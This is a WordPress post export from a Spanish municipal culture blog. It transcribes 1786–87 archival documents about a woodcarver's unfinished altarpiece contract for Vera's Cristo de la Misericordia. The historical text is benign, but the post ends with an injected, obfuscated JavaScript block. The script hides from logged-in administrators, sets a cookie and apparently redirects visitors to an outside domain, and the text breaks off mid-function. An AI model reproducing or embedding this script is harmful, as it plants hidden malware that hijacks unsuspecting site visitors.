{"id":1828,"date":"2016-01-29T09:41:57","date_gmt":"2016-01-29T09:41:57","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1828"},"modified":"2018-01-15T11:49:40","modified_gmt":"2018-01-15T11:49:40","slug":"misericordia-400-anos-en-vera-el-tallista-francisco-gonzalvez-1787","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/01\/29\/misericordia-400-anos-en-vera-el-tallista-francisco-gonzalvez-1787\/","title":{"rendered":"MISERICORDIA. 400 A\u00d1OS EN VERA. EL TALLISTA FRANCISCO GONZ\u00c1LVEZ. 1787"},"content":{"rendered":"<p>Se celebra el 400\u00ba aniversario de la imagen del Cristo de la Misericordia de la Hermandad de san Juan Evangelista de Vera. 27-12-15 a 27-02-2016.<\/p>\n<p><!--more--><\/p>\n<p>La Hermandad de san Juan Evangelista de Vera, dirigida por don Diego N\u00fa\u00f1ez Soler, Hermano Mayor, celebra el cuadringent\u00e9simo aniversario de su imagen con una serie de actividades organizadas por ella misma y que insertamos a continuaci\u00f3n.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0002-JPG.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-1830\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0002-JPG-300x212.jpg\" alt=\"PROGRAMA_MISERICORDIA_0002 JPG\" width=\"300\" height=\"212\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0002-JPG-300x212.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0002-JPG-1024x723.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0001-JPG-COMP.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1834\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0001-JPG-COMP-300x212.jpg\" alt=\"PROGRAMA_MISERICORDIA_0001 JPG COMP\" width=\"300\" height=\"212\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0001-JPG-COMP-300x212.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0001-JPG-COMP-1024x723.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/PROGRAMA_MISERICORDIA_0001-JPG-COMP.jpg 1772w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\">Efectivamente, como afirma Valeriano S\u00e1nchez Ramos en su libro <span style=\"color: #000000\"><span style=\"font-size: medium\">titulado <i>Los M\u00ednimos en Andaluc\u00eda<\/i> (cap\u00edtulo de los M\u00ednimos en Vera, p\u00e1gina 616):<\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: medium\">(\u2026) <i>Con el tiempo este crucificado se agrup\u00f3 a una fraternidad, los Hermanos del Sant\u00edsimo Cristo, corporaci\u00f3n de la que tenemos constancia que se erigi\u00f3 en el convento el 18 de mayo de 1655. Su festividad m\u00e1s se\u00f1era era la octava de la Trinidad, en donde la talla se procesionaba por las calles de Vera <\/i>[Archivo Hist\u00f3rico Provincial de Almer\u00eda, P-2017, F. 225 V.].<i> Por la invocaci\u00f3n recibida durante el siglo XVII, este crucificado debe corresponder -por traza y t\u00edtulo- al Cristo de la Misericordia que, procedente del convento, tambi\u00e9n se encuentra hoy en la iglesia parroquial<\/i> (&#8230;)<\/span><\/span><\/p>\n<p align=\"justify\">Como archivero que soy del Excmo. Ayuntamiento de Vera, me consultaron si cont\u00e1bamos con documentos que nos informaran sobre la imagen del Cristo de la Misericordia o sobre la Hermandad de san Juan Evangelista de Vera. Ya hab\u00eda olvidado que all\u00e1 por 2006 hab\u00eda descubierto un expediente en el que se demostraba la existencia de la Hermandad (el documento m\u00e1s antiguo conocido) en 1787 y que da cuenta de la notoria antig\u00fcedad de la imagen.<\/p>\n<p align=\"justify\">La transcripci\u00f3n completa del expediente es \u00e9sta. Disfruten de su lectura.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/1.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1831\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/1-211x300.jpg\" alt=\"1\" width=\"211\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/1-211x300.jpg 211w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/1-720x1024.jpg 720w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/1.jpg 787w\" sizes=\"(max-width: 211px) 100vw, 211px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>1787, octubre, 4. Vera<\/b><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\"><i><b>Don Francisco Caparr\u00f3s <\/b><b>y Garc\u00eda<\/b><b>, presb\u00edtero y teniente de cura de la Iglesia Parroquial de Vera, contra don Francisco Goz\u00e1lbez <\/b><b>(natural de Aspe, Valencia)<\/b><b>, maestro de tallista de la Ciudad, para que cumpla con su obligaci\u00f3n frente a la Hermandad de san Juan Evangelista de Vera y termine la obra que se comprometi\u00f3 a realizar: trono, retablo y mesa de altar tras la tala de cincuenta pinos de la villa de V\u00e9lez Blanco, para el Crucificado de la Misericordia de dicha Hermandad, dado el <\/b><b>mal estado en que se encontraban los anteriores. <\/b><b>Deb<\/b><b>e<\/b><b> pagar mil cien reales que prest\u00f3 a la Hermandad para cierta corta de unos maderos y dem\u00e1s que resulta. <\/b><b>Se embargan sus bienes.<\/b><\/i><\/span><\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/detalle-venerable-hermandad.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1836\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/detalle-venerable-hermandad-300x45.jpg\" alt=\"detalle venerable hermandad\" width=\"300\" height=\"45\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/detalle-venerable-hermandad-300x45.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/detalle-venerable-hermandad-1024x155.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/detalle-venerable-hermandad.jpg 1863w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">(FOLIO 2 R\u00ba) En la Ciudad de Vera a veinte y un d\u00edas del mes de Octubre de mil setecientos ochenta y seis a\u00f1os: Ante m\u00ed el escribano p\u00fablico del n\u00famero de ella y testigos infrascriptos, parecieron de la una parte don Francisco Caparr\u00f3s Presb\u00edtero, teniente de Cura de su Iglesia Parroquial, y Mayordomo de la Venerable Hermandad del Sr. San Juan Evangelista, que se venera en la Iglesia del Se\u00f1or San Agust\u00edn, Hospital Real de esta Ciudad, y de la otra, don Francisco Gonzanbes (<i>sic<\/i>), Maestro de Escultor Tallista y Dorador de este Vecindario, y dijeron: Que por Acuerdo celebrado por dicha venerable Hermandad, en el d\u00eda diez y ocho del mes de abril de este a\u00f1o, se dio comisi\u00f3n al primer otorgante para que solicitase del Excmo. Sr. (FOLIO 2 V\u00ba) Duque de Alba, se dignase conceder su permiso y Licencia para que en los Montes de su Estado de los V\u00e9lez, se cortaran cincuenta pinos de asierra para que con las maderas que produjesen se formasen un Trono, Retablo y Mesa de Altar al Se\u00f1or crucificado con el T\u00edtulo de la Misericordia, que se saca en la funci\u00f3n de Viernes Santo, en la tarde, mediante a que el Trono que al presente tiene se halla tan quebrantado que se teme la lastimosa desgracia de que caiga en tierra dicha Soberana Imagen, como no estar con la decencia que se merece y corresponde al culto divino; y habi\u00e9ndose practicado la correspondiente diligencia para el logro de tan piadoso fin, tanto por el primer otorgante como por uno de los hermanos devotos y celosos de que se compone dicha Hermandad, que su nombre y apellido (FOLIO 3 R\u00ba) se omite aunque es constante y se halla presente, tuvo efecto la concesi\u00f3n de dicha Licencia para el corte de Pinos en los Montes de la villa de V\u00e9lez Blanco, como de ella se acredita, que fue dada en veinte y siete de Junio pasado de este a\u00f1o, por dicho Sr. Excmo.; Y siendo forzoso hacer la expresada corta antes de que cumpla el t\u00e9rmino de seis meses estipulado para ella, contados desde el d\u00eda de su fecha, y consiguientemente construir el citado Trono, Retablo y Mesa de Altar a la Romana, para que est\u00e9 con decencia dicha soberana Imagen, se han conveniado ambos otorgantes, qued\u00e1ndose prestados por el indicado (FOLIO 3 V\u00ba) Don Francisco Caparr\u00f3s al don Francisco Gonz\u00e1lbez un mil y cien reales de un propio caudal por no tener dicha Hermandad fondos para hacer este pr\u00e9stamo, y cedi\u00e9ndole dicha licencia, ha de ser de su cargo cortar y reducir a maderas los narrados cincuenta pinos y con ellos formar y entregar en blanco las Alajas referidas en los t\u00e9rminos que se expresaron seg\u00fan los dise\u00f1os que entrega firmados de su pu\u00f1o y m\u00e1s lo que concept\u00fae arreglado a Conciencia, caso de quedarle alguna utilidad conclusa que sea la obra y pagados todos los gastos de la construcci\u00f3n y conducci\u00f3n de las enunciadas maderas, quedando (FOL. 4 R\u00ba) a su beneficio los sobrantes: Siendo obligado a volver los antedichos mil y cien reales para el d\u00eda \u00faltimo del mes de Agosto del venidero a\u00f1o: el Trono para el D\u00eda primero de Cuaresma para que c\u00f3modamente pueda dorarse y servir en la Semana Santa, y el Retablo con Mesa de Altar para el d\u00eda catorce de septiembre de dicho a\u00f1o: Por lo que ambos otorgantes, ciertos y sabedores de su Derecho y del que en este caso les corresponde, confesando como confiesan por cierta y verdadera la relaci\u00f3n de dicha escritura, por ella otorgan: El primero que deseando hacer beneficio a dicha Hermandad y favor al segundo otorgante, le facilita el pr\u00e9stamo de los un mil y cien reales arriba estipulados para que con ellos pueda ayudar a los costos que consigo trae la corta de los cincuenta Pinos contenidos en la Licencia que le entrega, siendo uno y otro a presencia de m\u00ed (FOL. 4 V\u00ba) el escribano y testigos; cedi\u00e9ndole como le cede a nombre de dicha Hermandad en uso de las facultades que se le confirieron todos los sobrantes de maderas, hecho que sea el Trono, Retablo y Mesa de Altar en blanco para que se aproveche de ellas en los t\u00e9rminos que le acomode; y este que recibiendo como recibe la enunciada cantidad, y Licencia referida, d\u00e1ndose como se da por contento y entregado a su satisfacci\u00f3n y voluntad, sobre que renuncia siendo necesario las Leyes de la entrega su prueba y dem\u00e1s del caso como en ellas se contiene, se obliga a dar y pagar llanamente y sin contienda de oficio al supradicho don Francisco Caparr\u00f3s los un mil y cien reales de su pr\u00e9stamo para el d\u00eda aplazado y lo mismo el Trono y retablo con Mesa de altar seg\u00fan los dise\u00f1os referidos a que se estar\u00e1 en todo tiempo, sin que en uno u otro caso se experimente la menor retardaci\u00f3n (sic) ni menos que pueda pedir rebaja ni descuento alguno a pretexto de haber salido perdidoso en este contrato, por confesar como confiesa que cuando no tenga ventajas conocidas no le resultar\u00e1 quebranto, quedando a su arbitrio facilitar todos los costos que se ocasionen y abonar los de secretar\u00eda y m\u00e1s lo que pueda a beneficio de dicha Hermandad. Y si la tuviere en el todo o parte, quiere ser ejecutado y apremiado por todo rigor de derecho con s\u00f3lo esta escritura y juramento de quien sea parte leg\u00edtima del derecho Don Francisco Caparr\u00f3s y de la expresada venerable Hermandad en que lo deja, y queda diferido decisorio y relevado de toda prueba y justificaci\u00f3n, aunque de derecho se requiera ya la Seguridad y firmeza de lo que dicho es (FOL. 5 V\u00ba) es ambos otorgantes, por lo que a cada uno toca guardar y cumplir, obligaron el primero los bienes y rentas de dicha Hermandad, y el segundo su persona, y los suyos muebles y ra\u00edces habidos y por haber, y especial y se\u00f1aladamente y sin que \u00e9sta vicie ni derogue la general, ni por el contrario, si que de ambos derechos se ha de poder usar a un mismo tiempo; hipotec\u00f3 el dicho don Francisco Gonz\u00e1lbez dos terceras partes de una suerte de tierra de riego, en el Pago llamado el Jauragui, t\u00e9rmino de la villa de Sorbas, que se componen de una fanega de sembradura, linde Gin\u00e9s de Yepes, don Juan Joseph Pinte\u00f1o, la Rambla y el Terrero, que expres\u00f3 valer trescientos ducados; cuya finca declar\u00f3 ser suya propia, habida y adquirida (FOL. 6 R\u00ba) con justo y leg\u00edtimo t\u00edtulo, valiosa en la cantidad que lleva asignada y sin m\u00e1s carga que la que anualmente le corresponde pagar a la Real Poblaci\u00f3n de este Reino y por tal la asegura y quiere est\u00e9 afecta a esta obligaci\u00f3n, la cual durante no ha de poder vender, donar, cambiar ni en manera alguna enajenar, partir ni dividir, aunque sea entre leg\u00edtimos herederos, pues aunque pase a segundo, tercero o m\u00e1s poseedores, ninguno ha de adquirir Se\u00f1or\u00edo ni cuasi posesi\u00f3n y se ha de reputar siempre en poder del otorgante que ambos lo dan cumplido seg\u00fan su obligaci\u00f3n a los se\u00f1ores Jueces y Justicias de Su Majestad, que de sus respectivas causas (FOL. 6 V\u00ba) puedan y deban conocer por fuero o por Derecho para que a ello los compelan como por sentencia definitiva de Juez competente, dada pronunciada y pasada en autoridad de cosa juzgada y por las partes convenida: Renunciaron todas Leyes, fueros y derechos de su favor y la que proh\u00edbe la general renunciaci\u00f3n de ellas en forma, quedando advertidos estos otorgantes de sacar copia de este instrumento, y presentarla a registro en el oficio de hipotecas para su validaci\u00f3n y firmeza, dentro del t\u00e9rmino prescripto por Su Majestad en la Real Pragm\u00e1tica Sanci\u00f3n, lo que ofrecieron cumplir; y en testimonio de ello as\u00ed lo otorgaron y firmaron, siendo testigos Diego Miguel Caparr\u00f3s (FOL. 7 R\u00ba), L\u00e1zaro Mellado Cervantes y Christ\u00f3bal Mu\u00f1oz L\u00f3pez, vecinos de esta Ciudad, a quienes y otorgantes, Yo, el escribano, doy fee conozco: Don Francisco Caparr\u00f3s: Francisco Gonz\u00e1lbez: Ante m\u00ed: Blas Miguel Xim\u00e9nez y Torres.<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1832\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/2-199x300.jpg\" alt=\"2\" width=\"199\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/2-199x300.jpg 199w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/2-678x1024.jpg 678w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/2.jpg 787w\" sizes=\"(max-width: 199px) 100vw, 199px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Concuerda literalmente con su original, que pas\u00f3 ante m\u00ed y queda en el registro Protocolo de escriban\u00eda y dem\u00e1s contractos para que por ante m\u00ed se otorgan en este presente a\u00f1o, anotado a su margen esta saca y papel y en mi poder y oficio numerario a que me remito: Y para que conste a pedimento de la parte, doy \u00e9sta, que signo y firmo en esta Ciudad de Vera a veinte y tres d\u00edas del mes de octubre de mil setecientos ochenta y seis a\u00f1os.<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">[Firma] Blas Miguel Xim\u00e9nez y Torres<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Queda tomada la raz\u00f3n de esta escritura en el oficio de hipotecas a mi cargo en el libro correspondiente a la villa de Sorbas (FOL. 7 V\u00ba) al folio segundo vuelto y siguiente y lo firmo en Vera a veinte y tres de octubre de este a\u00f1o. [Firma ilegible].<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">(FOLIO 8 R\u00ba)<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Aspe y Noviembre, 6 de [17]87. [Carta de Francisco Gonzalves dirigida a al Presb\u00edtero Francisco Caparr\u00f3s]<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Se\u00f1or Don Francisco Caparr\u00f3s:<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Muy Se\u00f1or m\u00edo: conozco que Vuestra Merced estar\u00e1 con bastante disgusto conmigo y io tengo bastante pues veo se ha cumplido el tiempo de lo escriturado, y no he cumplido. Io siento me aiga sucedido este quebranto, pues conozco la mucha falta que a Vuestra Merced le har\u00e1n los dineros, y quisiera allarme (sic) en \u00e9sa para proporcion\u00e1rselos, pero Dios ha dispuesto estas cosas y no lo puedo remediar. Si Vuestra Merced no lo pudiere esperar a que io vaia y vea el modo para satisfacerle de la madera, y de todo lo que se sepa ser m\u00edo en esa y en la de Sorbas, le doi permiso para que en lo que m\u00e1s le acomode se haga pagado, y Vuestra Merced perdone, y mande hasta la vista, que no s\u00e9 cu\u00e1ndo ser\u00e1, pues aunque est\u00e1 mi Madre mejorada, no est\u00e1 para poderme io retirar.<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">M.L.M. de Vuestra Merced. Su m\u00e1s atento Servidor. [Firma] Francisco Gonzalves.<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1833\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/3-196x300.jpg\" alt=\"3\" width=\"196\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/3-196x300.jpg 196w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/3-669x1024.jpg 669w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/01\/3.jpg 787w\" sizes=\"(max-width: 196px) 100vw, 196px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">(FOLIO 10 R\u00ba)<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Don Francisco Caparr\u00f3s y Garc\u00eda, Presb\u00edtero y maiordomo de la Venerable Hermandad del Se\u00f1or san Juan Evangelista, situada en la Iglesia del Se\u00f1or san Agust\u00edn, Hospital Real de esta Ciudad; Ante V. como mejor proceda de derecho, y sin perjuicio de otro, que a la expresada venerable Hermandad, mi parte corresponda, de que protesto usar en caso necesario: Digo que don Francisco Gonz\u00e1lbez, Maestro de Escultor, Tallista y Dorador de este vecindario, se oblig\u00f3 a darme y pagarme llanamente y sin contienda de juicio la cantidad de un mil y cien reales, que le prest\u00e9 para que ejecutara la corta de maderas que ten\u00eda proiectadas para el d\u00eda treinta y uno de agosto, que pas\u00f3 de este a\u00f1o, y lo mismo el trono y retablo con mesa de Altar para el en que se hallaba colocado el Se\u00f1or de las Misericordias, Imagen propia de la expresada venerable hermandad, que se hallaba colocada en la mencionada Iglesia, seg\u00fan los dise\u00f1os que se hab\u00edan formado. El trono para el d\u00eda primero de Cuaresma, para que c\u00f3modamente pudiera dorarse, y servir en la Semana Santa, y el retablo con mesa de Altar para el d\u00eda catorce de Septiembre pr\u00f3ximo pasado, como se corrobora por esta escritura, que otorg\u00f3 (FOLIO 11 V\u00ba) juntamente conmigo a los veinte y uno de Octubre del a\u00f1o que pas\u00f3 de setecientos ochenta y seis, y cuya copia presento en debida forma: en esta atenci\u00f3n, como asunto tan piadoso y justo, siendo regular que vencidos los plazos estipulados, el mencionado Gonz\u00e1lbez hubiera cumplido con cuanto le correspond\u00eda, pag\u00e1ndome la enunciada cantidad de un mil y cien reales, por ser m\u00eda, a mi nombre tambi\u00e9n hago en este juicio para reintegrarme de ella, y practicando las dem\u00e1s obras que quedan relacionadas, s\u00f3lo lo ha hecho del predicho trono, y no de lo dem\u00e1s, y habi\u00e9ndose ausentado de esta ciudad para la villa de Aspe, en el reino de Valencia, me fue preciso el reconvenirlo extrajudicialmente, por medio de su mujer y result\u00f3 de esta diligencia el que me escribiera esta carta, que presento con el juramento necesario: Uno el hacerme pago de aquella cantidad, ni menos el fabricar el antedicho Retablo con mesa de Altar; y no siendo justo que uno ni otro lo dilate por la notable falta que hace para los fines correspondientes; por tanto y para su debido remedio de todo: A V. pido y suplico se sirva mandar habiendo por presentada la referida copia de escritura y carta, en consideraci\u00f3n a la naturaleza de este asunto; por lo perteneciente a mi propio derecho, <b>despachar mandamiento de ejecuci\u00f3n contra los bienes del mencionado don Francisco Gonz\u00e1lbez, que tiene en <\/b>(FOLIO 11 R\u00ba) <b>esta ciudad y en la villa de Sorbas hipotecados, especialmente por la enunciada cantidad de un mil y cien reales, y por m\u00e1s las costas causadas y que se causaren, hasta su efectivo pago, y bajo de la protesta de admitirle cuentas los que sean leg\u00edtimos; y para la traba en los bienes que se <\/b><b>h<\/b><b>allan en la Jurisdicci\u00f3n de la expresada villa<\/b>, se libre el correspondiente Despacho, instruido en forma, cometido a su Real Justicia: Y as\u00ed mismo por lo respectivo al derecho de la expresada venerable Hermandad, mi parte en atenci\u00f3n a la obligaci\u00f3n personal\u00edsima de <b>hacer mandar se apremie al referido don Francisco Gonz\u00e1lbez a que sin p\u00e9rdida de tiempo se venga a esta Ciudad a fabricar el mencionado Retablo y mesa de Altar, ejecut\u00e1ndose el pretendido apremio en su persona y bienes<\/b>; y en consideraci\u00f3n a que la madera que tiene para la pretendida construcci\u00f3n perteneciente a la dicha mi parte se halla en esta Ciudad, y es f\u00e1cil que la mujer de dicho Gonz\u00e1lbez la extrav\u00ede y venda, para obviar semejantes perjuicios, <b>se recoja de donde existiere y se retenga<\/b> por ahora y hasta otra Providencia en persona lega, llana y abonada, conforme a derecho; y para el solicitado apremio se libre el competente despacho cometido a la Real Justicia de las ciudades, Villas y Lugares de estos Reinos donde se hallare el mencionado Gonz\u00e1lbez, que vaia instruido con los insertos que se (FOL. 11 V\u00ba) necesitaren; y fecho se me entreguen los autos en cuia vista protesto exponer y alegar lo conveniente a mi derecho y al de la referida venerable Hermandad: entendi\u00e9ndose tambi\u00e9n el solicitado apremio por todas las costas causadas y que se causaren en este procedimiento, y para todo ello hago el expediente que sea m\u00e1s adecuado a Justicia, que con costas pido Justicia y Juro. [Firmas:] Don Francisco Caparr\u00f3s, Licenciado Don Pedro Joseph Navarro Gil de Flores<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Auto: Por presentada con la copia de Escritura y carta que cita y autos. Lo mand\u00f3 y firm\u00f3 el Se\u00f1or don Dionisio Mar\u00eda de Montalbo, abogado de los Reales Consejos, Alcalde Maior de esta ciudad de Vera, la de Moj\u00e1car y sus partidos, y subdelegado de F\u00e1bricas de Iglesia de esta Maiordom\u00eda en ella a cuatro d\u00edas del mes de octubre de mil setecientos ochenta y siete a\u00f1os. [Firmas:] Montalbo, Blas Miguel Xim\u00e9nez y Torres.<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Auto: H\u00e1gase embargo y dep\u00f3sito de las maderas que se encuentren en las casas de don Francisco Gonz\u00e1lbe\u00f1, Maestro de Tallista de esta Ciudad, y todas cuantas se encuentren ser de su pertenencia, lo que ejecute el presente escribano para evitar costas sirviendo este auto de mandameinto en forma y derecho, auto lo mand\u00f3 y firm\u00f3 el Se\u00f1or don Dionisio Mar\u00eda de Montalbo, Abogado de los Reales consejos, Alcalde Maior de esta Ciudad de Vera, la de Moj\u00e1car y sus partidos, a cinco d\u00edas del mes de octubre de mil setecientos ochenta y siete a\u00f1os. [Firma:] Blas Miguel Xim\u00e9nez y Torres<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Notificaci\u00f3n. Incontinenti, yo, el escribano, hice saber el auto anterior, como se contiene, a don Francisco Caparr\u00f3s propio, en su Persona, qued\u00f3 enterado de que Doy fee. [Firma:] Xim\u00e9nez.<\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\"><b>Embargo y dep\u00f3sito<\/b>. En la Ciudad de Vera a seis d\u00edas del mes de octubre de mil setecientos ochenta y siete a\u00f1os: Yo, el escribano en cumplimiento de lo que se manda en el auto anterior y comisi\u00f3n que por \u00e9l se me confiere, me const\u00f3 que en las casas de don Francisco Gonz\u00e1lbez, Maestro de Escultor, tallista y Dorador de esta dicha Ciudad, y estando en ellas Antonia Grero, su mujer, hizo embargo en las maderas siguientes: Primeramente tres viguetas cuadradas de cinco varas: treinta y nueve piezas o tablones de cinco varas de largo de palmo y medio de ancho y dos pulgadas y media de grueso: seis tablas comunes de cinco varas: otros dos tablones de cinco varas de largo, media de ancho (FOLIO 12 V\u00ba) y seis pulgadas de grueso: en las cuales dichas maderas hice embargo formal y de ellas nombr\u00e9 por Depositario a <b>Josef Joaqu\u00edn Caparr\u00f3s, Maestro de Carpintero<\/b> de esta dicha Ciudad, quien estando presente, dijo se daba y dio por entregado de dichas maderas, a su satisfacci\u00f3n y voluntad, y se oblig\u00f3 a responder de ellas en todo tiempo y, en defecto, su valor, siempre que se le mande por el Se\u00f1or Juez que de estos autos conoce, no otro que lo sea competente a Ley de depositario Real, y llano, y bajo las penas de tal, para lo que oblig\u00f3 en persona y bienes muebles y ra\u00edces, habidos y por haber, con poder\u00edo de Justicias y renuncia de Leyes y fueros, y as\u00ed lo otorg\u00f3 y no firm\u00f3 por decir no saber, lo hizo a su ruego uno de los testigos, que lo son presentes: don Luis Garc\u00eda Ruiz, Alguacil Mayor perpetuo de esta expresada Ciudad, don Josef de Torres y Mart\u00edn Pi\u00f1ero Gonz\u00e1lez, vecinos de ella, a quienes y otorgante, doy fee. Conozco: [FIRMAS]<\/span><\/span><\/span><\/p>\n<p align=\"right\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\"> <span style=\"font-family: AmerType Md BT,serif\">Transcripci\u00f3n realizada por Manuel Caparr\u00f3s Perales<\/span><\/span><\/span><\/span><\/p>\n<p align=\"right\"><span style=\"color: #000000\"><span style=\"font-family: AmerType Md BT,serif\"><span style=\"font-size: medium\">Archivo Municipal de Vera<\/span><\/span><\/span><\/p>\n<p align=\"right\"><span style=\"color: #000000\"><span style=\"font-family: AmerType Md BT,serif\"><span style=\"font-size: medium\">Vera, 14 de enero de 2016<\/span><\/span><\/span><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function 